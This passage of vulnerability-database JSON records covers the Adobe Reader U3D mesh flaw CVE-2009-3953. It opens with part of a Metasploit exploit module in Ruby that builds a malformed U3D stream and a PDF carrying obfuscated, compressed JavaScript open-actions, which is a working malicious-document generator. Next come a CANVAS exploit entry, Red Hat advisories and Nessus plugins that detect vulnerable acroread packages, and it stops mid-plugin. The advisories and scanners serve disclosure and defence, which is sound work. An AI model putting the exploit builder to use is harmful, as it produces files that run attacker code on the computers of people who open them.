ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n def u3d_pad(str, char=\"\\x00\")\n ret = \"\"\n if (str.length % 4) > 0\n ret << char * (4 - (str.length % 4))\n end\n return ret\n end\n\n\n def make_u3d_stream(size, meshname)\n\n # build the U3D header\n hdr_data = [1,0].pack('n*') # version info\n hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV')\n hdr = \"U3D\\x00\"\n hdr << [hdr_data.length,0].pack('VV')\n hdr << hdr_data\n\n # mesh declaration\n decl_data = [meshname.length].pack('v')\n decl_data << meshname\n decl_data << [0].pack('V') # chain idx\n # max mesh desc\n decl_data << [0].pack('V') # mesh attrs\n decl_data << [1].pack('V') # face count\n decl_data << [size].pack('V') # position count\n decl_data << [4].pack('V') # normal count\n decl_data << [0].pack('V') # diffuse color count\n decl_data << [0].pack('V') # specular color count\n decl_data << [0].pack('V') # texture coord count\n decl_data << [1].pack('V') # shading count\n # shading desc\n decl_data << [0].pack('V') # shading attr\n decl_data << [0].pack('V') # texture layer count\n decl_data << [0].pack('V') # texture coord dimensions\n # no textore coords (original shading ids)\n decl_data << [size+2].pack('V') # minimum resolution\n decl_data << [size+3].pack('V') # final maximum resolution (needs to be bigger than the minimum)\n # quality factors\n decl_data << [0x12c].pack('V') # position quality factor\n decl_data << [0x12c].pack('V') # normal quality factor\n decl_data << [0x12c].pack('V') # texture coord quality factor\n # inverse quantiziation\n decl_data << [0].pack('V') # position inverse quant\n decl_data << [0].pack('V') # normal inverse quant\n decl_data << [0].pack('V') # texture coord inverse quant\n decl_data << [0].pack('V') # diffuse color inverse quant\n decl_data << [0].pack('V') # specular color inverse quant\n # resource params\n decl_data << [0].pack('V') # normal crease param\n decl_data << [0].pack('V') # normal update param\n decl_data << [0].pack('V') # normal tolerance param\n # skeleton description\n decl_data << [0].pack('V') # bone count\n # padding\n decl_pad = u3d_pad(decl_data)\n mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV')\n mesh_decl << decl_data\n mesh_decl << decl_pad\n\n # build the modifier chain\n chain_data = [meshname.length].pack('v')\n chain_data << meshname\n chain_data << [1].pack('V') # type (model resource)\n chain_data << [0].pack('V') # attributes (no bounding info)\n chain_data << u3d_pad(chain_data)\n chain_data << [1].pack('V') # number of modifiers\n chain_data << mesh_decl\n modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')\n modifier_chain << chain_data\n\n # mesh continuation\n cont_data = [meshname.length].pack('v')\n cont_data << meshname\n cont_data << [0].pack('V') # chain idx\n cont_data << [0].pack('V') # start resolution\n cont_data << [0].pack('V') # end resolution\n # no resolution update, unknown data follows\n cont_data << [0].pack('V')\n cont_data << [1].pack('V') * 10\n mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')\n mesh_cont << cont_data\n mesh_cont << u3d_pad(cont_data)\n\n data = hdr\n data << modifier_chain\n data << mesh_cont\n\n # patch the length\n data[24,4] = [data.length].pack('V')\n\n return data\n\n end\n\n def make_pdf(u3d_stream, js_doc, js_pg1)\n\n xref = []\n eol = \"\\x0a\"\n obj_end = \"\" << eol << \"endobj\" << eol\n\n # the header\n pdf = \"%PDF-1.7\" << eol\n\n # filename/comment\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # js stream (doc open action js)\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js_doc))\n pdf << io_def(1) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << obj_end\n\n # js stream 2 (page 1 annot js)\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js_pg1))\n pdf << io_def(2) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << obj_end\n\n # catalog\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Catalog/Outlines \") << io_ref(4)\n pdf << n_obfu(\"/Pages \") << io_ref(5)\n pdf << n_obfu(\"/OpenAction \") << io_ref(8) << n_obfu(\">>\")\n pdf << obj_end\n\n # outline\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Outlines/Count 0>>\")\n pdf << obj_end\n\n # pages/kids\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Pages/Count 2/Kids [\")\n pdf << io_ref(10) << \" \" # empty page\n pdf << io_ref(11) # u3d page\n pdf << n_obfu(\"]>>\")\n pdf << obj_end\n\n # u3d stream\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<</Type/3D/Subtype/U3D/Length %s>>\" % u3d_stream.length) << eol\n pdf << \"stream\" << eol\n pdf << u3d_stream << eol\n pdf << \"endstream\"\n pdf << obj_end\n\n # u3d annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype\")\n pdf << \"/3D/3DA <</A/PO/DIS/I>>\"\n pdf << n_obfu(\"/Rect [0 0 640 480]/3DD \") << io_ref(6) << n_obfu(\"/F 7>>\")\n pdf << obj_end\n\n # js dict (open action js)\n xref << pdf.length\n pdf << io_def(8) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(1) + \">>\" << obj_end\n\n # js dict (page 1 annot js)\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(2) + \">>\" << obj_end\n\n # page 0 (empty)\n xref << pdf.length\n pdf << io_def(10) << n_obfu(\"<</Type/Page/Parent \") << io_ref(5) << n_obfu(\"/MediaBox [0 0 640 480]\")\n pdf << n_obfu(\" >>\")\n pdf << obj_end\n\n # page 1 (u3d/print)\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<</Type/Page/Parent \") << io_ref(5) << n_obfu(\"/MediaBox [0 0 640 480]\")\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"]\")\n pdf << n_obfu(\"/AA << /O \") << io_ref(9) << n_obfu(\">>\")\n pdf << n_obfu(\">>\")\n pdf << obj_end\n\n # xrefs\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n # trailer\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(3) << \">>\" << eol\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n pdf << \"%%EOF\" << eol\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3953", "CVE-2009-2994"], "edition": 2, "description": "**Name**| acrobat_u3d_mesh \n---|--- \n**CVE**| CVE-2009-3953 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_u3d_mesh \n**Notes**| CVE Name: CVE-2009-3953 \nNotes: \nThis exploit works on Windows XP without DEP. DEP defaults to \"opt-in\" on Windows XP SP2/3. IE8 and modern Firefox \nwill opt-in to DEP, causing this exploit to fail silently. \n \nIE7 will work by default (opt-in). Obviously, if the machine does not support DEP (older machines) \nthen this exploit will also work. \n \n \nVersionsAffected: Acrobat Reader <=8.1.6 and <=9.1.3 (SA|IE6,7,8|FF3.0.15,5.4) NODEP! \nRepeatability: \nReferences: http://www.adobe.com/support/security/bulletins/apsb09-15.html \nDate public: 10/13/2009 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2994 \n\n", "modified": "2010-01-13T19:30:00", "published": "2010-01-13T19:30:00", "id": "ACROBAT_U3D_MESH", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_u3d_mesh", "type": "canvas", "title": "Immunity Canvas: ACROBAT_U3D_MESH", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-05-29T14:34:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3953", "CVE-2009-3954", "CVE-2009-3955", "CVE-2009-3956", "CVE-2009-3959", "CVE-2009-4324"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should no\nlonger be used. A specially-crafted PDF file could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader when opened. (CVE-2009-4324, CVE-2009-3953, CVE-2009-3954,\nCVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe Reader\n9 for Linux is not compatible with Red Hat Enterprise Linux 3. An\nalternative PDF file viewer available in Red Hat Enterprise Linux 3 is\nxpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.", "modified": "2017-07-22T04:04:18", "published": "2010-01-20T05:00:00", "id": "RHSA-2010:0060", "href": "https://access.redhat.com/errata/RHSA-2010:0060", "type": "redhat", "title": "(RHSA-2010:0060) Critical: acroread security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3953", "CVE-2009-3954", "CVE-2009-3955", "CVE-2009-3956", "CVE-2009-3959", "CVE-2009-4324"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory APSB10-02\npage listed in the References section. A specially-crafted PDF file could\ncause Adobe Reader to crash or, potentially, execute arbitrary code as the\nuser running Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs:\n\n* the acroread process continued to run even after closing a PDF file. If\nmultiple PDF files were opened and then closed, the acroread processes\ncontinued to run and consume system resources (up to 100% CPU usage). With\nthis update, the acroread process correctly exits, which resolves this\nissue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash when\nattempting to open signed PDF files. For such files, if an immediate crash\nwas not observed, clicking on the Signature Panel could trigger one. With\nthis update, the PPKLite.api plug-in is included, which resolves this\nissue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All users of\nAdobe Reader are advised to install these updated packages, which contain\nAdobe Reader version 9.3, which is not vulnerable to these issues and fixes\nthese bugs. All running instances of Adobe Reader must be restarted for the\nupdate to take effect.", "modified": "2017-07-27T07:21:28", "published": "2010-01-13T05:00:00", "id": "RHSA-2010:0037", "href": "https://access.redhat.com/errata/RHSA-2010:0037", "type": "redhat", "title": "(RHSA-2010:0037) Critical: acroread security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:33:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3953", "CVE-2009-3954", "CVE-2009-3955", "CVE-2009-3956", "CVE-2009-3959", "CVE-2009-4324"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory APSB10-02\npage listed in the References section. A specially-crafted PDF file could\ncause Adobe Reader to crash or, potentially, execute arbitrary code as the\nuser running Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All users of\nAdobe Reader are advised to install these updated packages, which contain\nAdobe Reader version 9.3, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2017-07-28T19:00:26", "published": "2010-01-13T05:00:00", "id": "RHSA-2010:0038", "href": "https://access.redhat.com/errata/RHSA-2010:0038", "type": "redhat", "title": "(RHSA-2010:0038) Critical: acroread security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:07:23", "description": "Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.", "edition": 28, "published": "2013-01-24T00:00:00", "title": "RHEL 5 : acroread (RHSA-2010:0037)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "p-cpe:/a:redhat:enterprise_linux:acroread"], "id": "REDHAT-RHSA-2010-0037.NASL", "href": "https://www.tenable.com/plugins/nessus/63911", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0037. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63911);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37756, 37757, 37758, 37761, 37763);\n script_xref(name:\"RHSA\", value:\"2010:0037\");\n\n script_name(english:\"RHEL 5 : acroread (RHSA-2010:0037)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3959\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4324\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0037\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0037\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:25", "description": "The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.", "edition": 26, "published": "2013-01-24T00:00:00", "title": "RHEL 3 : acroread (RHSA-2010:0060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:acroread-uninstall"], "id": "REDHAT-RHSA-2010-0060.NASL", "href": "https://www.tenable.com/plugins/nessus/63914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0060. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63914);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0060\");\n\n script_name(english:\"RHEL 3 : acroread (RHSA-2010:0060)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0060.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread-uninstall package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-uninstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) 